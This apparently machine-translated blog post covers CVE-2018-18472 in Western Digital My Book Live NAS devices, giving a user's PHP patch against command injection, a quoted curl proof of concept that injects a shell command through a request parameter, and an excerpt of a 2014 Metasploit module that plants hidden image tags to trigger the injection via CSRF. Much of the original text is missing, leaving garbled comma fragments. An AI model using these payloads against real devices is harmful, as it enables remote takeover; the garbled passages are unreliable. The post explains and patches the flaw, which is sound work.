What is the reputation or custom fix for CVE-2018-18472 from NAS WD?

For the much-talked- about story of Western Digital's NAS wiping, read @ZlodeiBaal's post : Western Digital erased most user NAS

Here it will also be about fixing a vulnerability, which, as it turned out, is 7 years old (2014), let Western Digital unsubscribe 3 days ago with the following paragraph:

"The My Book Live series was introduced to the market in 2010 and received the latest firmware update in 2015.

The My Book Live series was introduced to the market in 2010 and these devices received their final firmware update in 2015. [1]

17 hours ago user dracenmarx posted the following instructions to fix a Remote Code Execution (RCE) bug:

• We go through SSH and edit the file (for example, with nano):

  
  
  
  
  

• /var/www/Admin/webapp/includes/languageConfiguration.php

  
  
  
  
  

• The first change, we find:

  
  
  
  
  

exec("sudo bash -c '(echo \"language {$changes["language"]}\">/etc/language.conf)'", $output, $retVal);
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

• Replace with:

  
  
  
  
  

if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $changes["language"], $dummy)) return 'BAD_REQUEST';
exec("sudo bash -c '(echo '\"'\"".escapeshellarg("language {$changes["language"]}")."\"'\"'>/etc/language.conf)'", $output, $retVal);
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

• The second change, we find:

  
  
  
  
  

exec("sudo bash -c '(echo \"language {$lang["language"]}\">/etc/language.conf)'", $output, $retVal);
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

Replace with:

if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $lang["language"], $dummy)) return 'BAD_REQUEST';
exec("sudo bash -c '(echo '\"'\"".escapeshellarg("language {$lang["language"]}")."\"'\"'>/etc/language.conf)'", $output, $retVal);
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

More, according to him, he did not find similar errors.

, , , , sudo c sudoers. , ​, - ! , exec , STDOUT.

, dracenmarx , 2018- , ? https://cve.circl.lu/cve/CVE-2018-18472 ( - WizCase)

Western Digital WD My Book Live ( ) language /api/1.0/rest/language_configuration. , .

, , — . ? — . WizCase PoC:

curl -kX GET -d ‘bim=param`whoami`’ https:///panel/rest/configuration
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

WD 2018-, , , . , , , . - dracenmarx, 26 .

, dracenmarx:

CVE-2018-18472, , 2014-! (WDMyCloud Command Injection CSRF) , MyBookLive WD ?! - dracenmarx, 26

. 20- 2014. Metasploit. :

Name: WDMyCloud NAS Command Injection CSRF

Description: This module exploits a command injection vulnerability in the web interface of the WDMyCloud NAS device, via CSRF. It will submit the CSRF request to RHOST, as well as wdmycloud and wdmycloud.local.

DisclosureDate: 0 day, yo

3 , , NAS, .

params = "format=xml&rest_method=PUT&language=" + Rex::Text.uri_encode("`#{payload.encoded}`")
...
<html>
<body>
<h1>Redirecting... Please Wait</h1>
<div style='display:none'>
<img src='http://wdmycloud.local/api/1.0/rest/language_configuration?#{params}' />
<img src='http://wdmycloud/api/1.0/rest/language_configuration?#{params}' />
<img src='http://#{datastore['RHOST']}/api/1.0/rest/language_configuration?#{params}' />
</div>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

, . language ! 2014.

, . 11 2014- 29- 2015-. , ... PR :)

, "", (→ https://gist.github.com/phikshun) 7 , , WD - 2018-. - ( , ), — , :

The vulnerability report CVE-2018-18472 affects My Book Live devices originally introduced to the market between 2010 and 2012. These products have been discontinued since 2014 and are no longer covered under our device software support lifecycle. We encourage users who wish to continue operating these legacy products to configure their firewall to prevent remote access to these devices, and to take measures to ensure that only trusted devices on the local network have access to the device.

Western Digital takes the security of our customers’ data seriously, and we provide security updates for our products to address issues from both external reports and regular security audits. Additionally, we welcome the opportunity to work with members of the security research community through responsible disclosure to help protect our users. [...]

- WizCase

— B2B, . MBA, IT.

, , — , .

— .

, TestDisk/PhotoRec . — dd, — openssl . , :

I got a quote for data recovery and it was $2,000 to $5,000. Unbelievable. - mkennedy

Another affected user here in Canada. I had no idea there was an issue until I read the email from WD this afternoon. I checked the drive and sure enough, only the default folders were there. I unplugged the drive and here we are. I’m a hobby photographer, approximately 80,000 photos gone. I’m on the support chat waitlist, it’s been 11 seconds remaining for the past 20 minutes so I’m not holding my breath. - damack604